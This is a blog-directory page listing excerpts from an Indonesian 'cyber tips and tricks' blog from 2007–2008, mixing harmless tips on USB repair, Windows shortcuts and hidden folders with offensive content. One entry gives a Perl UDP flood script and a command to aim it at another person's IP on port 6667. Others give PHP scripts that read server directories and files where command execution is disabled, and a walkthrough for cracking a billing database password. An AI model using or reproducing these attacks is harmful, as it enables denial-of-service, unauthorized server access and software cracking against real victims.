DirectoryInternetBlog Details for "Cyber Knowledge And Tips Trick"

Cyber Knowledge And Tips Trick

Cyber Knowledge And Tips Trick
Sekedar blog untuk sharing dan belajar, disini semuanya masih tahap belajar, jadi diharapkan komentar yang bertujuan untuk membantu pembaca yang lain dalam bentuk tutorial

Articles

UG Fiesta 2008
2008-05-18 10:16:00
UG Fiesta 2008 UG Fiesta is an event that involves ICT people from academics to business in exploring and encouraging ICT implementations. Seminar, Talk show, Video Conference, Exhibition and UG IT Camp are main activities in this event. UG Fiesta will award the UG ICT Award for best website and ICT implementation in School and Small ...
[old cheat] Tutorial caddie stats hack for PangyaID by SysTrojan[me]
2008-04-18 14:08:00
Isenk ah mengenang masa lalu saat masih doyan main game, dulu saya paling suka sekali main game ini (Pangya!). Trus sempet juga membuat cheat tp belum kesampaian trainernya coz dah banyak trainer2 untuk game tersebut. Ok tanpa basa basi lagi, check this out ! Sebelumnya saya kasih deskripsi “Hanya Untuk Pemain PangYa SEJATI” dengan maksud mengembalikan ...
More About: Cheat , Tutorial , Hack , Stats , Caddie
Tutorial Hacking Billing Explorer Database All Version
2008-01-23 11:28:00
Close your Billing .exe Open your billing folder, search file bill01.008 change the extention to bill01.mdb, open it with ms. acc*** gotcha, an password protect that file. solve problem : search google for : advance password recovery ms.acc*** then find the crack for that software. Clue for the software is -elco*soft [recommended]- Next, install the software, patch it !!! Run the software, search the ...
More About: Tutorial , Database , Explorer , Version
Mengembalikan Data pada USB yang Bermasalah
2007-11-22 13:25:00
Hallo kawan-kawan, saya mo nulis lagi nih berbagi informasi dan pengalaman. Kali ini saya mo share satu software menarik, software ini berguna untuk mengembalikan data-data yang hilang pada USB yang bermasalah, baik itu usb/flash disk harus di format, kena virus, write-protect dan harus di format ulang. Jangan khawatir data-data anda yang telah hilang itu akan kembali lagi ...
More About: Data , Yang
Tutorial Shell,Eggdrop,PsyBNC for IRC
2007-10-19 13:39:00
Sekarang kita mo ngomongin seluk beluk shell nih, khususnya shell yang dipergunakan untuk kepentingan IRC. Sebelumnya tau ga Shell itu apa? Shell adalah program khusus yang digunakan sebagai interface antara user dengan kernel. Lalu apa itu kernel?? Kernel merupakan inti suatu operating system. Secara sederhananya, kernel berfungsi sebagai penghubung antara hardware dengan software yang berjalan pada ...
More About: Tutorial , Drop
ALL ShortCuts Windows
2007-10-07 08:48:00
Akhirnya bisa nulis lagi… Berhubung kehabisan bahan menyambut Hari Raya Idul Fitri, ini ada sedikit pengetahuan tentang shortcut yang ada di windows, check this oUt !!! ============== Run Commands: <===== klik tombol Start > Run. Ketik Commands di bawah ini dan tekan Enter ============== compmgmt.msc - Computer management devmgmt.msc - Device manager diskmgmt.msc - Disk management dfrg.msc - Disk defrag eventvwr.msc ...
More About: Windows , Shortcuts , Shortcut
Cara Ngebenerin/Ngebetulin/Memperbaiki USB FlashDIsk
2007-09-30 10:48:00
Berhubung banyak teman yang kena masalah USB nya tidak terdeteksi oleh komputer alias tidak bisa dibuka di my computer, ini ada salah satu cara untuk bisa di buka kembali. Logika secara umum : Flash disk tidak terdeteksi mungkin dikarenakan driver FDD tidak sesuai dengan OS yang dipakai, terdapat crash system fat pada flash disk tersebut dan kemungkinan ...
More About: Cara , Aiki , Neri , Flashdisk , Erin
cari MP3 dan file audio di google
2007-09-22 04:56:00
Copy/Paste di titlepage : javascript:void(qr=prompt('FUSE%20-%20Mus ic%20Search%20Indexer%20-%20Type%20any%20 Music%20or%20Album%20Name:%20','') );if(qr)location.href='http://www3.google .com/search?&num=100&hl=en&ie =UTF-8&oe=UTF-8&btnG=Google +Searc h&as_epq=parent+directory=&as_o q=mp3+wma+ogg+anonymous&as_eq=module+ modules&lr=&a s_ft=i&as_filetype=&as_qdr=all 8;as_occt=any&as_dt=i &as_sitesearch=&safe=images&a s_q='+escape(qr);void %201; setelah itu ada window yang nanyain judul lagu, ato penyanyi sampai dengan penciptanya….ketik aja disitu
More About: Audio , File
Bikin Web SMS Gratis Sendiri
2007-09-22 04:34:00
Buat yg pgn py website sms gratis or mo nambahin webnya biar bs kirim sms gratis tp blm py script wrappernya, silahkan download di: Code: http://rapidshare.com/files/44328731/m3gu e.zip Buat yg dah py versi pertamanya, versi yg ini lebih ramping, ga pake javascript. Buat yg dah py, ya ga usah download Khusus yg masih baru kenal ma script wrapper ini: - Daftar ...
More About: Gratis
[Trik] Mengunci Folder Tanpa Software
2007-09-22 04:29:00
nah caranya pertama , bikin NEW TEXT DOCUMENT kemudian isi dengan :   <p class=”smallfont” style=”margin-bottom: 2px” @ECHO OFF titipan kunci folder if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B3030 9D}” goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Serius nich mau Kunci ??(Y/N) set/p “cho=>” if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B3030 9D}” attrib +h +s “Control panel.{21EC2020-3AEA-1069-A2DD-08002B3030 9D}” echo Fold ernya ...
More About: Software , Folder
Cara membuat folder hidden tanpa bantuan software
2007-09-22 04:26:00
utk ngetes bener apa ngganya silahkan ikuti cara2 di bawah ini: pertama buat folder sembarang, luw bisa bikin di drive yg mana saja terserah nah setelah jadi newfolder klik kanan rename dah…eit jgn ketik namanya dulu tapi lakukan ini-> tahan tombol keyboard “ALT” lalu ketik angka “0160″ dengan begitu namanya akan hilang. terus klik kanan folder tersebut pilih ...
More About: Software , Hidden , Cara , Fold , Folder
[Tips] Manfaatkan SMS Gratis Yahoo! Widget
2007-09-22 04:21:00
Kirim mengirim SMS lewat komputer sekarang makin mudah saja, gratis lagi. Salah satunya fasilitas free text message dari Callwave yang memungkinkan kita mengirim SMS lintas operator, bahkan lintas negara ke semua orang di dunia tanpa dikenakan biaya alias free. Agar bisa mengirim SMS melalui komputer, jelas Anda harus terkoneksi internet. Sedangkan aplikasinya bisa menggunakan Yahoo Widget , ...
More About: Tips , Gratis , Yahoo!
[tutor] Nembak IP orang Via Port 6667
2007-09-22 04:14:00
Quote: download source malanghack.net/alat/udp.txtcommandnya perl udp.txt xxx.xxx.xxx.xxx 6667 10000000000000000000000000000000 ini scriptnya kl gk mau cara diatas Code: #!/usr/bin/perl ######################################### ############ # udp flood. # # Sincan2 #malanghack # # Sincan2 ######################################### #############use Socket; $ARGC=@ARGV; if ($ARGC !=3) {  printf "$0 <ip> <port> <time> ";  printf "if arg1/2 =0, randports/continous packets. ";  exit(1); } my ($ip,$port,$size,$time);  $ip=$ARGV[0];  $port=$ARGV[1];  $time=$ARGV[2]; socket(crazy, PF_INET, SOCK_DGRAM, 17);   $iaddr = inet_aton("$ip"); printf "udp flood - Sincan2"; if ($ARGV[1] ==0 && $ARGV[2] ==0) {  goto randpackets; } if ($ARGV[1] !=0 && $ARGV[2] !=0) ...
More About: Port
Mengakali server yang mematikan fungsi CMD
2007-09-22 04:04:00
1. bukadir.php 2. baca.php isi script bukadir.php <html> <head> <title>:..: Membaca Isi Folder:..:</title> </head> <body bgcolor=”#666666″> <?php if(!$Submit) { echo “<center>DOCUMENT ROOT : $DOCUMENT_ROOT”; ?> <form name=”hackdir” method=”post” action=”"> <table width=”500″> <tr bgcolor=”#000000″> <td width=”112″>Masukkan Path : </td> <td width=”300″><input name=”dir” type=”text” id=”dir” size=”50″></td> </tr> </table> <input type=”submit” name=”Submit” value=”Submit”> </form> <a href=”admindb.php”>halama n muka</a> <?php } else { echo “<center> path $dir.<p>”; $path = $dir; $dir = o...
More About: Server , Yang , Kali , Serve , Akal
128565 blogs in the directory.
Statistics resets every week.


Contact | About
© Blog Toplist 2017